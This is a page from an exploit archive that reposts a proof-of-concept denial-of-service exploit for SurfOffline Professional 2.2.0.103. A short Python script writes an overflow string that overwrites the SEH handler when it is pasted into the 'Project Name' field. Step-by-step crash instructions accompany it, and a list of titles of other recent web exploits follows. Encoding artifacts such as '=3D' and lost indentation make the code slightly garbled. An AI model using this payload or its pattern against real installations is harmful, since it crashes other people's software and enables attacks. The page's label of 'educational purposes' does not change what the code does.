Surfoffline professional 2.2.0.103 project name denial of service (seh) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-12-19 | Type : dos | Platform : windows
This exploit / vulnerability Surfoffline professional 2.2.0.103 project name denial of service (seh) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH=20

#!/usr/bin/python

payload =3D "A" * 382 + "B" * 4 + "C" * 4

try:
fileCreate =3Dopen("exploit.txt","w")
print("[x] Creating file")
fileCreate.write(payload)
fileCreate.close()
print("[x] File created")
except:
print("[!] File failed to be created")

Surfoffline professional 2.2.0.103 project name denial of service (seh)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Surfoffline professional 2.2.0.103 project name denial of service (seh) Vulnerability / Exploit